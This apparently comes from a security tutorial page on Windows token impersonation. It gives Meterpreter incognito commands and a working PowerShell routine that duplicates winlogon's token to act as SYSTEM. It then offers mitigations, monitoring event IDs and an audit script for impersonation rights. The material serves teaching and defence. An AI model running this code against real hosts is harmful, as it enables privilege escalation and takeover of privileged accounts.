# Token Impersonation Attack

### Overview

**Token impersonation** is a Windows privilege escalation and lateral-movement technique in which an attacker reuses the **access token** of another user or service account to act as that identity **without knowing its password**.

Every logon session (interactive, RDP, service, scheduled task) creates an access token that stays in memory for as long as the session lives. If a high-privileged account (e.g., a Domain Admin or SYSTEM) has a session on a host the attacker controls with sufficient privileges, the attacker can **duplicate or impersonate that token**, effectively becoming that account on that host.

### Prerequisites

1. Local administrator or SYSTEM on the target host: enumerating and duplicating tokens that belong to other logon sessions requires opening other users' processes, which is not possible from a standard user context.
2. A privileged user or service must have an active logon session on that host so that its token is present in memory.
3. The attacking process must hold `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` (both are granted to local administrators and to the built-in service accounts by default).

### Steps

1. Obtain Local Admin or SYSTEM Access

   ```bash
   # Meterpreter commands: confirm the current context and elevate to SYSTEM
   getuid
   getsystem
   ```
2. Enumerate Available Tokens

   ```bash
   # Meterpreter commands: list_tokens is provided by the incognito extension, so load it first
   load incognito
   list_tokens -u
   ```

   `list_tokens` separates **delegation tokens** (from interactive, RDP and service logons; usable for network authentication to other hosts) from **impersonation tokens** (typically from network logons; valid only on the local host).
3. Impersonate the Token

   ```bash
   # Meterpreter commands: the backslash must be doubled inside the quotes
   impersonate_token "DOMAIN\\Administrator"
   getuid
   ```
4. Execute Commands as the Impersonated User

   ```bash
   # Meterpreter: drop into a native shell, then run commands inside it
   shell
   whoami
   ```
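The Win32 API sequence that `impersonate_token` performs, as an added example written for this page (it is not Metasploit code): open a process that runs as the target identity, open its primary token, duplicate it as an impersonation token, and attach that token to the current thread. It assumes an elevated PowerShell session on a host where `winlogon.exe` (which runs as SYSTEM) is present; the process name is a parameter, and the function name `Invoke-TokenImpersonation` is this example's own.

```powershell
# Added example, not from the original page. Run from an elevated PowerShell prompt.
# Assumes: local admin (SeDebugPrivilege available), target process name supplied by caller.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class TokenOps {
    public const uint PROCESS_QUERY_INFORMATION = 0x0400;
    public const uint TOKEN_DUPLICATE   = 0x0002;
    public const uint TOKEN_IMPERSONATE = 0x0004;
    public const uint TOKEN_QUERY       = 0x0008;
    public const int  SecurityImpersonation = 2;   // SECURITY_IMPERSONATION_LEVEL
    public const int  TokenImpersonation    = 2;   // TOKEN_TYPE (TokenPrimary = 1)

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attrs,
                                               int impersonationLevel, int tokenType, out IntPtr newToken);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool ImpersonateLoggedOnUser(IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool RevertToSelf();
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr handle);
}
"@

function Invoke-TokenImpersonation {
    param([Parameter(Mandatory)][string]$ProcessName)

    $before = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name

    # An elevated admin token holds SeDebugPrivilege but has it disabled; this .NET call enables it,
    # which is what allows OpenProcess on a SYSTEM-owned process.
    [System.Diagnostics.Process]::EnterDebugMode()

    $proc  = Get-Process -Name $ProcessName -ErrorAction Stop | Select-Object -First 1
    $hProc = [TokenOps]::OpenProcess([TokenOps]::PROCESS_QUERY_INFORMATION, $false, $proc.Id)
    if ($hProc -eq [IntPtr]::Zero) {
        throw "OpenProcess failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }

    # Step 2 equivalent: get a handle to the target's primary token.
    $hTok = [IntPtr]::Zero
    if (-not [TokenOps]::OpenProcessToken($hProc, ([TokenOps]::TOKEN_DUPLICATE -bor [TokenOps]::TOKEN_QUERY), [ref]$hTok)) {
        throw "OpenProcessToken failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }

    # A primary token cannot be attached to a thread directly; duplicate it as an impersonation token.
    $hDup = [IntPtr]::Zero
    if (-not [TokenOps]::DuplicateTokenEx($hTok, ([TokenOps]::TOKEN_QUERY -bor [TokenOps]::TOKEN_IMPERSONATE),
            [IntPtr]::Zero, [TokenOps]::SecurityImpersonation, [TokenOps]::TokenImpersonation, [ref]$hDup)) {
        throw "DuplicateTokenEx failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }

    # Step 3 equivalent: the current thread now carries the stolen identity.
    if (-not [TokenOps]::ImpersonateLoggedOnUser($hDup)) {
        throw "ImpersonateLoggedOnUser failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    $during = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name

    # Drop the impersonation and release the handles.
    [void][TokenOps]::RevertToSelf()
    $after = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    foreach ($h in @($hDup, $hTok, $hProc)) { [void][TokenOps]::CloseHandle($h) }

    [pscustomobject]@{ Before = $before; Impersonating = $during; AfterRevert = $after }
}

# Usage: with winlogon.exe as the target, Impersonating reads NT AUTHORITY\SYSTEM.
Invoke-TokenImpersonation -ProcessName 'winlogon'
```

`WindowsIdentity.GetCurrent()` reads the thread token when one is present, so the returned object shows the identity change and the revert on the same thread. Impersonation only changes what the calling thread can do; to start a whole new process under the stolen identity, the token would instead be duplicated as a primary token (`TokenPrimary`) and handed to `CreateProcessWithTokenW`, which additionally requires `SeImpersonatePrivilege`.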

### Mitigations

1. Restrict Impersonation Privileges: grant `SeImpersonatePrivilege` and `SeAssignPrimaryTokenPrivilege` (Group Policy, User Rights Assignment) only to the built-in service accounts and to application identities that genuinely need them; a compromised web or database service account holding these rights is a direct path to SYSTEM.
2. Limit Local Admin Access: keep privileged domain accounts from logging on to workstations and lower-tier servers (tiered administration, logon restrictions), so that their tokens are never present on hosts an attacker is likely to control first.
3. Monitor Token Abuse: alert on Event ID 4672 (special privileges assigned to new logon) for accounts that are not expected to hold these rights, and on process-creation telemetry (Sysmon Event ID 1) where a child process runs as a different user than its parent, which is the footprint left when a shell is spawned under an impersonated token.
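A host-side check for the first mitigation, added as an example for this page (not part of the original checklist): export the local User Rights Assignment with `secedit`, list who holds the two impersonation rights, and flag any principal beyond the Windows defaults. The function name `Get-ImpersonationRightHolders` and the default-holder SID lists are this example's assumptions about a stock installation (IIS, for instance, legitimately adds `IIS_IUSRS`); run it from an elevated prompt, which `secedit /export` requires.

```powershell
# Added example, not from the original page. Requires an elevated PowerShell prompt.
function Get-ImpersonationRightHolders {
    # Well-known SIDs that hold each right on a default Windows install (assumption, stock OS only).
    $defaults = @{
        'SeImpersonatePrivilege'        = @('S-1-5-32-544', 'S-1-5-6', 'S-1-5-19', 'S-1-5-20')  # Administrators, SERVICE, LOCAL SERVICE, NETWORK SERVICE
        'SeAssignPrimaryTokenPrivilege' = @('S-1-5-19', 'S-1-5-20')                              # LOCAL SERVICE, NETWORK SERVICE
    }

    # secedit writes an INF file; the USER_RIGHTS area contains lines such as
    #   SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
    $cfg = Join-Path $env:TEMP "user-rights-audit.inf"
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $lines = Get-Content $cfg
    Remove-Item $cfg -Force

    foreach ($right in $defaults.Keys) {
        $line = $lines | Where-Object { $_ -match "^$right\s*=" } | Select-Object -First 1
        $holders = @()
        if ($line) {
            $holders = ($line -split '=', 2)[1].Trim() -split ',' |
                ForEach-Object { $_.Trim().TrimStart('*') } |
                Where-Object { $_ }
        }

        foreach ($holder in $holders) {
            # Entries are normally SIDs; translate for display but compare against the defaults by SID.
            $name = $holder
            if ($holder -match '^S-1-') {
                try {
                    $name = (New-Object System.Security.Principal.SecurityIdentifier($holder)).
                                Translate([System.Security.Principal.NTAccount]).Value
                } catch { $name = $holder }
            }
            [pscustomobject]@{
                Right     = $right
                Holder    = $name
                Sid       = $holder
                IsDefault = ($defaults[$right] -contains $holder)
            }
        }
    }
}

# Usage: show only the non-default holders, which are the ones to justify or remove.
Get-ImpersonationRightHolders | Where-Object { -not $_.IsDefault } | Format-Table -AutoSize
```

Comparing by SID rather than by translated name keeps the check valid on localized systems and on hosts where a group has been renamed. Any row with `IsDefault` false should map to a documented service requirement; everything else is a candidate for removal through Group Policy.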
